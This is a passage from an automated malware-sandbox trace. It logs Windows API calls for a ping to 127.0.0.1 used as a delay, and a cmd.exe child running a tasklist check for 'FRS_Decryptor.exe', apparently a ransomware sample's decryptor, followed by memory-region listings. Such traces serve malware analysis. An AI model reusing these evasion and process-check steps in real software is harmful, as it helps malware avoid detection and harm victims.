(_FileHandle=1) returned 0x28 [0083.819] GetFileType (hFile=0x28) returned 0x2 [0083.819] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f064 | out: lpMode=0xa6f064) returned 0 [0083.819] GetLastError () returned 0x6 [0083.819] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efc8, nSize=0x50 | out: lpBuffer="¦✨") returned 0x0 [0083.819] _fileno (_File=0x76ea4c28) returned 1 [0083.819] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0083.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.819] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xdc8ac0 [0083.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xdc8ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0083.819] _fileno (_File=0x76ea4c28) returned 1 [0083.819] _write (in: _FileHandle=1, _Buf=0xdc8ac0*, _MaxCharCount=0x9 | out: _Buf=0xdc8ac0*) returned 9 [0083.819] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.819] _fileno (_File=0x76ea4c28) returned 1 [0083.819] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0083.819] LocalFree (hMem=0xdc8ac0) returned 0x0 [0083.819] LocalFree (hMem=0xdd7b08) returned 0x0 [0083.819] Sleep (dwMilliseconds=0x3e8) [0084.828] IcmpSendEcho2Ex (in: IcmpHandle=0xdc6c60, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xdcc3b8, RequestSize=0x20, RequestOptions=0xa6f11c, ReplyBuffer=0xdd5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xdd5270) returned 0x1 [0084.828] InetNtopW (in: Family=2, pAddr=0xa6f10c, pStringBuf=0xa6f234, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0084.829] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xa6f0a0, nSize=0x0, Arguments=0xa6f09c | out: lpBuffer="羠Ý充¦⛔\x94䰨盪✣") returned 0x16 [0084.829] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0084.829] _fileno (_File=0x76ea4c28) returned 1 [0084.829] _get_osfhandle (_FileHandle=1) returned 0x28 [0084.829] GetFileType (hFile=0x28) returned 0x2 [0084.829] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f064 | out: lpMode=0xa6f064) returned 0 [0084.829] GetLastError () returned 0x6 [0084.829] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efc8, nSize=0x50 | out: lpBuffer="¦✣") returned 0x0 [0084.829] _fileno (_File=0x76ea4c28) returned 1 [0084.829] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0084.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0084.829] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xdd7fd8 [0084.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xdd7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0084.829] _fileno (_File=0x76ea4c28) returned 1 [0084.829] _write (in: _FileHandle=1, _Buf=0xdd7fd8*, _MaxCharCount=0x16 | out: _Buf=0xdd7fd8*) returned 22 [0084.829] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0084.829] _fileno (_File=0x76ea4c28) returned 1 [0084.829] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0084.829] LocalFree (hMem=0xdd7fd8) returned 0x0 [0084.829] LocalFree (hMem=0xdd7fa0) returned 0x0 [0084.829] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xa6f0a0, nSize=0x0, Arguments=0xa6f09c | out: lpBuffer="羠Ý充¦⛿\x94䰨盪✼") returned 0x9 [0084.829] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0084.829] _fileno (_File=0x76ea4c28) returned 1 [0084.829] _get_osfhandle (_FileHandle=1) returned 0x28 [0084.829] GetFileType (hFile=0x28) returned 0x2 [0084.829] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f064 | out: lpMode=0xa6f064) returned 0 [0084.829] GetLastError () returned 0x6 [0084.829] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efc8, nSize=0x50 | out: lpBuffer="¦✼") returned 0x0 [0084.829] _fileno (_File=0x76ea4c28) returned 1 [0084.829] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0084.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0084.829] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xdc8a30 [0084.830] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xdc8a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0084.830] _fileno (_File=0x76ea4c28) returned 1 [0084.830] _write (in: _FileHandle=1, _Buf=0xdc8a30*, _MaxCharCount=0x9 | out: _Buf=0xdc8a30*) returned 9 [0084.830] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0084.830] _fileno (_File=0x76ea4c28) returned 1 [0084.830] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0084.830] LocalFree (hMem=0xdc8a30) returned 0x0 [0084.830] LocalFree (hMem=0xdd7fa0) returned 0x0 [0084.830] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xa6f0a4, nSize=0x0, Arguments=0xa6f0a0 | out: lpBuffer="羠Ý充¦➷\x94䰨盪✧") returned 0x9 [0084.830] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0084.830] _fileno (_File=0x76ea4c28) returned 1 [0084.830] _get_osfhandle (_FileHandle=1) returned 0x28 [0084.830] GetFileType (hFile=0x28) returned 0x2 [0084.830] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f068 | out: lpMode=0xa6f068) returned 0 [0084.830] GetLastError () returned 0x6 [0084.830] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efcc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0084.830] _fileno (_File=0x76ea4c28) returned 1 [0084.830] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0084.830] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0084.830] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xdc8a30 [0084.830] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xdc8a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0084.830] _fileno (_File=0x76ea4c28) returned 1 [0084.830] _write (in: _FileHandle=1, _Buf=0xdc8a30*, _MaxCharCount=0x9 | out: _Buf=0xdc8a30*) returned 9 [0084.830] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0084.830] _fileno (_File=0x76ea4c28) returned 1 [0084.830] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0084.830] LocalFree (hMem=0xdc8a30) returned 0x0 [0084.830] LocalFree (hMem=0xdd7fa0) returned 0x0 [0084.830] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xa6f0a0, nSize=0x0, Arguments=0xa6f09c | out: lpBuffer="羠Ý充¦⟘\x94䰨盪✨") returned 0x9 [0084.830] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0084.830] _fileno (_File=0x76ea4c28) returned 1 [0084.831] _get_osfhandle (_FileHandle=1) returned 0x28 [0084.831] GetFileType (hFile=0x28) returned 0x2 [0084.831] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f064 | out: lpMode=0xa6f064) returned 0 [0084.831] GetLastError () returned 0x6 [0084.831] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efc8, nSize=0x50 | out: lpBuffer="¦✨") returned 0x0 [0084.831] _fileno (_File=0x76ea4c28) returned 1 [0084.831] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0084.831] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0084.831] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xdc8a48 [0084.831] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xdc8a48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0084.831] _fileno (_File=0x76ea4c28) returned 1 [0084.831] _write (in: _FileHandle=1, _Buf=0xdc8a48*, _MaxCharCount=0x9 | out: _Buf=0xdc8a48*) returned 9 [0084.831] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0084.831] _fileno (_File=0x76ea4c28) returned 1 [0084.831] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0084.831] LocalFree (hMem=0xdc8a48) returned 0x0 [0084.831] LocalFree (hMem=0xdd7fa0) returned 0x0 [0084.831] Sleep (dwMilliseconds=0x3e8) [0085.833] IcmpSendEcho2Ex (in: IcmpHandle=0xdc6c60, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xdcc3b8, RequestSize=0x20, RequestOptions=0xa6f11c, ReplyBuffer=0xdd5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xdd5270) returned 0x1 [0085.833] InetNtopW (in: Family=2, pAddr=0xa6f10c, pStringBuf=0xa6f234, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0085.833] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xa6f0a0, nSize=0x0, Arguments=0xa6f09c | out: lpBuffer="羠Ý充¦⛔\x94䰨盪✣") returned 0x16 [0085.833] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.833] _fileno (_File=0x76ea4c28) returned 1 [0085.833] _get_osfhandle (_FileHandle=1) returned 0x28 [0085.833] GetFileType (hFile=0x28) returned 0x2 [0085.834] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f064 | out: lpMode=0xa6f064) returned 0 [0085.834] GetLastError () returned 0x6 [0085.834] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efc8, nSize=0x50 | out: lpBuffer="¦✣") returned 0x0 [0085.834] _fileno (_File=0x76ea4c28) returned 1 [0085.834] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0085.834] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0085.834] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xdd7fd8 [0085.834] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xdd7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0085.834] _fileno (_File=0x76ea4c28) returned 1 [0085.834] _write (in: _FileHandle=1, _Buf=0xdd7fd8*, _MaxCharCount=0x16 | out: _Buf=0xdd7fd8*) returned 22 [0085.834] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.834] _fileno (_File=0x76ea4c28) returned 1 [0085.834] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0085.834] LocalFree (hMem=0xdd7fd8) returned 0x0 [0085.834] LocalFree (hMem=0xdd7fa0) returned 0x0 [0085.834] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xa6f0a0, nSize=0x0, Arguments=0xa6f09c | out: lpBuffer="羠Ý充¦⛿\x94䰨盪✼") returned 0x9 [0085.834] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.834] _fileno (_File=0x76ea4c28) returned 1 [0085.834] _get_osfhandle (_FileHandle=1) returned 0x28 [0085.834] GetFileType (hFile=0x28) returned 0x2 [0085.834] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f064 | out: lpMode=0xa6f064) returned 0 [0085.834] GetLastError () returned 0x6 [0085.834] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efc8, nSize=0x50 | out: lpBuffer="¦✼") returned 0x0 [0085.834] _fileno (_File=0x76ea4c28) returned 1 [0085.834] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0085.834] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.834] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xdc8940 [0085.834] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xdc8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0085.834] _fileno (_File=0x76ea4c28) returned 1 [0085.834] _write (in: _FileHandle=1, _Buf=0xdc8940*, _MaxCharCount=0x9 | out: _Buf=0xdc8940*) returned 9 [0085.834] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.834] _fileno (_File=0x76ea4c28) returned 1 [0085.834] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0085.834] LocalFree (hMem=0xdc8940) returned 0x0 [0085.834] LocalFree (hMem=0xdd7fa0) returned 0x0 [0085.834] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xa6f0a4, nSize=0x0, Arguments=0xa6f0a0 | out: lpBuffer="羠Ý充¦➷\x94䰨盪✧") returned 0x9 [0085.834] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.834] _fileno (_File=0x76ea4c28) returned 1 [0085.834] _get_osfhandle (_FileHandle=1) returned 0x28 [0085.834] GetFileType (hFile=0x28) returned 0x2 [0085.834] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f068 | out: lpMode=0xa6f068) returned 0 [0085.834] GetLastError () returned 0x6 [0085.834] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efcc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0085.834] _fileno (_File=0x76ea4c28) returned 1 [0085.834] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0085.834] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.834] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xdc8ac0 [0085.834] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xdc8ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0085.835] _fileno (_File=0x76ea4c28) returned 1 [0085.835] _write (in: _FileHandle=1, _Buf=0xdc8ac0*, _MaxCharCount=0x9 | out: _Buf=0xdc8ac0*) returned 9 [0085.835] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.835] _fileno (_File=0x76ea4c28) returned 1 [0085.835] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0085.835] LocalFree (hMem=0xdc8ac0) returned 0x0 [0085.835] LocalFree (hMem=0xdd7fa0) returned 0x0 [0085.835] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xa6f0a0, nSize=0x0, Arguments=0xa6f09c | out: lpBuffer="羠Ý充¦⟘\x94䰨盪✨") returned 0x9 [0085.835] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.835] _fileno (_File=0x76ea4c28) returned 1 [0085.835] _get_osfhandle (_FileHandle=1) returned 0x28 [0085.835] GetFileType (hFile=0x28) returned 0x2 [0085.835] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f064 | out: lpMode=0xa6f064) returned 0 [0085.835] GetLastError () returned 0x6 [0085.835] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efc8, nSize=0x50 | out: lpBuffer="¦✨") returned 0x0 [0085.835] _fileno (_File=0x76ea4c28) returned 1 [0085.835] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0085.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.835] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xdc8a30 [0085.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xdc8a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0085.835] _fileno (_File=0x76ea4c28) returned 1 [0085.835] _write (in: _FileHandle=1, _Buf=0xdc8a30*, _MaxCharCount=0x9 | out: _Buf=0xdc8a30*) returned 9 [0085.835] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.835] _fileno (_File=0x76ea4c28) returned 1 [0085.835] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0085.835] LocalFree (hMem=0xdc8a30) returned 0x0 [0085.835] LocalFree (hMem=0xdd7fa0) returned 0x0 [0085.835] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xa6f028, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0085.835] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xa6effc, nSize=0x0, Arguments=0xa6eff8 | out: lpBuffer="羠Ý¦᧰\x94䰨盪❏") returned 0x5c [0085.835] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.835] _fileno (_File=0x76ea4c28) returned 1 [0085.835] _get_osfhandle (_FileHandle=1) returned 0x28 [0085.835] GetFileType (hFile=0x28) returned 0x2 [0085.835] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6efc0 | out: lpMode=0xa6efc0) returned 0 [0085.835] GetLastError () returned 0x6 [0085.835] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6ef24, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0085.835] _fileno (_File=0x76ea4c28) returned 1 [0085.835] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0085.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0085.835] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xdd8068 [0085.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xdd8068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0085.835] _fileno (_File=0x76ea4c28) returned 1 [0085.835] _write (in: _FileHandle=1, _Buf=0xdd8068*, _MaxCharCount=0x5c | out: _Buf=0xdd8068*) returned 92 [0085.836] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.836] _fileno (_File=0x76ea4c28) returned 1 [0085.836] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0085.836] LocalFree (hMem=0xdd8068) returned 0x0 [0085.836] LocalFree (hMem=0xdd7fa0) returned 0x0 [0085.836] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xa6f008, nSize=0x0, Arguments=0xa6f004 | out: lpBuffer="羠Ý¦ᨧ\x94䰨盪❓") returned 0x61 [0085.836] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.836] _fileno (_File=0x76ea4c28) returned 1 [0085.836] _get_osfhandle (_FileHandle=1) returned 0x28 [0085.836] GetFileType (hFile=0x28) returned 0x2 [0085.836] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6efcc | out: lpMode=0xa6efcc) returned 0 [0085.836] GetLastError () returned 0x6 [0085.836] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6ef30, nSize=0x50 | out: lpBuffer="¦❓") returned 0x0 [0085.836] _fileno (_File=0x76ea4c28) returned 1 [0085.836] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0085.836] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0085.836] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xdd8070 [0085.836] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xdd8070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0085.836] _fileno (_File=0x76ea4c28) returned 1 [0085.836] _write (in: _FileHandle=1, _Buf=0xdd8070*, _MaxCharCount=0x61 | out: _Buf=0xdd8070*) returned 97 [0085.836] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0085.836] _fileno (_File=0x76ea4c28) returned 1 [0085.836] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0085.836] LocalFree (hMem=0xdd8070) returned 0x0 [0085.836] LocalFree (hMem=0xdd7fa0) returned 0x0 [0085.836] IcmpCloseHandle (IcmpHandle=0xdc6c60) returned 1 [0085.836] LocalFree (hMem=0xdcc3b8) returned 0x0 [0085.836] LocalFree (hMem=0xdd5270) returned 0x0 [0085.836] WSACleanup () returned 0 [0085.837] exit (_Code=0) Thread: id = 215 os_tid = 0x6b8 Thread: id = 216 os_tid = 0xbfc Process: id = "70" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x11d38000" os_pid = "0x770" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3756 start_va = 0xdf0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 3757 start_va = 0xe10000 end_va = 0xe11fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 3758 start_va = 0xe20000 end_va = 0xe2efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 3759 start_va = 0xe30000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 3760 start_va = 0xe70000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 3761 start_va = 0xf70000 end_va = 0xf73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 3762 start_va = 0xf80000 end_va = 0xf80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 3763 start_va = 0xf90000 end_va = 0xf91fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 3764 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3765 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3766 start_va = 0x7ed30000 end_va = 0x7ed52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed30000" filename = "" Region: id = 3767 start_va = 0x7ed57000 end_va = 0x7ed57fff entry_point = 0x0 region_type = private name = "private_0x000000007ed57000" filename = "" Region: id = 3768 start_va = 0x7ed5b000 end_va = 0x7ed5bfff entry_point = 0x0 region_type = private name = "private_0x000000007ed5b000" filename = "" Region: id = 3769 start_va = 0x7ed5d000 end_va = 0x7ed5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ed5d000" filename = "" Region: id = 3770 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 